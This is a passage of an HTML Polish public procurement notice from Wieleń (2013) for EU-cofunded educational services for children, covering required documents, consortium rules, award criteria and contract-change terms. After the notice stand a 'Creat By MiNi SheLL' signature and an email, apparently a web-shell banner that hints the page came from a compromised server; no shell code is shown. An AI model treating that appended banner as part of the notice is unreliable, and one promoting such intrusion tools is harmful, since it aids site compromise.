<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 1	wypełniony formularz oferty wraz z oświadczeniem o zapoznaniu się z treścią specyfikacji i wzorem umowy, o związaniu  ofertą oraz aktualności dostarczonych oświadczeń wraz z oświadczeniem o ujęciu kosztów dodatkowych oraz wypełniony formularz cenowy.
Załącznik nr 6	pełnomocnictwo do reprezentowania wykonawcy w postępowaniu, z którego wynika jego zakres, podpisane przez osoby uprawnione do reprezentowania Wykonawcy (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie X i XI SIWZ). Uwaga: Pełnomocnictwo powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.
Załącznik nr 3a 	oświadczenie wykonawcy potwierdzające doświadczenie w świadczeniu usług podobnych rodzajowo do przedmiotu zamówienia, tj. świadczenie usług edukacyjnych lub szkoleniowych, których odbiorcami były dzieci. Zamawiający nie narzuca wzoru załącznika 3a.
Załącznik nr 5	wykaz osób, które posiadają przeszkolenie z równość szans wraz z informacją o podstawie dysponowania tymi osobami.

Załącznik nr 5a	oświadczenia osób przewidzianych do prowadzenia zajęć, że dysponują  przeszkoleniem z zakresu równości szans.

OFERTA SKŁADANA PRZEZ SPÓŁKĘ CYWILNĄ
W przypadku składania oferty przez spółkę cywilną oświadczenie - załącznik nr 6, dotyczyć winno każdego ze wspólników tej spółki. Wspólnicy spółki cywilnej zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo, a w przypadku, gdy upoważnienie wynika wprost z treści umowy spółki, umowę  należy dołączyć  do oferty.  Przykładowy wzór pełnomocnictwa - Załącznik nr 6a.
         Uwaga: Pełnomocnictwo winno być udzielone przez wszystkich wykonawców tj.  wspólników spółki cywilnej.
OFERTA SKŁADANA PRZEZ KONSORCJUM
1.	Wykonawcy tworzący konsorcjum, ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo, a w przypadku, gdy upoważnienie wynika wprost z treści umowy konsorcjum, umowę  należy dołączyć do oferty. Przykładowy wzór pełnomocnictwa - Załącznik nr 6b.
Uwaga: Pełnomocnictwo winno być udzielone przez wszystkich wykonawców wchodzących w skład  konsorcjum. 
2.	W przypadku wyboru przez zamawiającego oferty złożonej przez konsorcjum, wykonawcy tworzący konsorcjum zobowiązani będą najpóźniej przed podpisaniem umowy na wykonanie zamówienia, do przedłożenia umowy konsorcjum.
3.	Wszyscy członkowie konsorcjum ponoszą solidarnie odpowiedzialność prawną 
za realizację zamówienia. Problematykę zobowiązań solidarnych w zakresie nie uregulowanym przez umowę konsorcjum regulują przepisy kodeksu cywilnego.

4. 	Ocena spełnienia przez konsorcjum warunków i  wymogów określonych w specyfikacji 
w pkt. VIII.2 będzie polegała na łącznej ocenie złożonych dokumentów. 
5.   	Oferta konsorcjum musi być podpisana i oznaczona w taki sposób, by prawnie zobowiązywała wszystkie podmioty wchodzące w skład konsorcjum</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie - 30</li>
<li>3 - kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian- Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej pod rygorem nieważności i dopuszczalne są w następujących okolicznościach:
a) w przypadku zmiany nazw, siedzib stron umowy, numerów kont bankowych oraz innych danych identyfikacyjnych, 
b) w przypadku zmiany przepisów prawa powszechnie obowiązującego w zakresie wysokości stawki podatku od towarów i usług, 
c) w przypadku zmian asortymentu, spowodowanych m.in. wycofaniem produktu z rynku, z zastrzeżeniem, że cena nowego produktu nie będzie wyższa niż dotychczasowego, 
d) zmiany osób wyznaczonych do realizacji zamówienia z ramienia Wykonawcy z zastrzeżeniem, że zmiana danej osoby na inną o nie mniejszych kwalifikacjach niż wykazana w ofercie może nastąpić jedynie w przypadkach losowych, na które Wykonawca z chwilą składania oferty nie miał wpływu i wymaga każdorazowej zgody Zamawiającego.
e) zmian terminu realizacji umowy i poszczególnych jej części, nie później jednak niż do daty końcowej realizacji projektu,
f) innych zmian, których nie można przewidzieć w chwili zawierania umowy pod warunkiem, że zmiany te będą korzystne dla Zamawiającego,
g) zmian prowadzących do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy
h) dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienia ani na wynik postępowania o udzielenie zamówienia publicznego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wielen.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samorządowa Administracja Oświatowa
ul. Drawska 1,
64-730 Wieleń 
I piętro, pokój 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 10:00, miejsce: Samorządowa Administracja Oświatowa
ul. Drawska 1,
64-730 Wieleń 
I piętro, pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego
Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic  w jakości  usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com